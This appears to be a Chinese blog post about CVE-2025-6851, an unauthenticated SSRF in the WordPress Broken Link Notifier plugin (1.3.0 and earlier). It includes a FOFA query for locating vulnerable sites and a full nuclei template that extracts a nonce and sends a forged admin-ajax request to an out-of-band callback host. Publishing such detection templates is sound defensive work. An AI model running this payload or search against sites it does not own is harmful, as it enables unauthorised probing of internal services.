WordPress Broken Link Notifier 服务器端请求伪造漏洞

漏洞信息

漏洞名称: WordPress Broken Link Notifier 服务器端请求伪造漏洞

漏洞编号:

  • CVE: CVE-2025-6851

漏洞类型: 服务器端请求伪造

漏洞等级: 高危

漏洞描述: WordPress的Broken Link Notifier插件在1.3.0及之前的所有版本中存在服务器端请求伪造(SSRF)漏洞。该漏洞源于ajax_blinks()函数最终调用的check_url_status_code()函数未对用户提供的URL进行充分验证,使得未经认证的攻击者能够利用该漏洞发起对任意位置的Web请求。这种攻击可以用于查询和修改内部服务的信息,从而可能导致敏感数据泄露或服务中断。由于该漏洞不需要认证即可利用,且可以自动化执行,因此对使用该插件的WordPress网站构成了严重的安全威胁。受影响的用户应立即升级到1.3.1或更高版本以修复此漏洞。

产品厂商: WordPress

产品名称: Broken Link Notifier

影响版本: version <= 1.3.0

搜索语法: body=”blnotifier_front_end”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/dc96d101fcb7644d50cf080f65f53b5ca7e39c47/http%2Fcves%2F2025%2FCVE-2025-6851.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62

id: CVE-2025-6851

info:
  name: WordPress Broken Link Notifier < 1.3.1 - Unauthenticated SSRF
  author: iamnoooob,pdresearch
  severity: high
  description: |
    The Broken Link Notifier plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.3.0 via the ajax_blinks() function which ultimately calls the check_url_status_code() function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.
  remediation: Fixed in 1.3.1.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-6851
    - https://wpscan.com/vulnerability/CVE-2025-6851
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/broken-link-notifier/broken-link-notifier-130-unauthenticated-server-side-request-forgery
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/wp-content/plugins/broken-link-notifier/"
    fofa-query: body="blnotifier_front_end"
  tags: cve,cve2025,wp-plugin,wordpress,ssrf,oast,unauth,wpscan,broken-link-notifier

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true

    matchers:
      - type: dsl
        dsl:
          - contains(body, 'blnotifier_front_end')
        internal: true

    extractors:
      - type: regex
        part: body
        internal: true
        name: nonce
        group: 1
        regex:
          - 'blnotifier_front_end.*"nonce":"(.*?)"'

  - raw:
      - |-
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: xmlhttprequest
        Content-Type: application/x-www-form-urlencoded

        action=blnotifier_blinks&nonce={{nonce}}&source_url=http://test&header_links[]=http://{{interactsh-url}}&

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'dns')
          - contains_all(body, 'notify', 'timing', 'Results were generated in')
          - status_code == 200
        condition: and


Github Poc
#projectdiscovery/nuclei-templates:github issues #服务器端请求伪造
WordPress Broken Link Notifier 服务器端请求伪造漏洞
http://example.com/2025/07/15/github_3769171926/
作者
lianccc
发布于
2025年7月15日
许可协议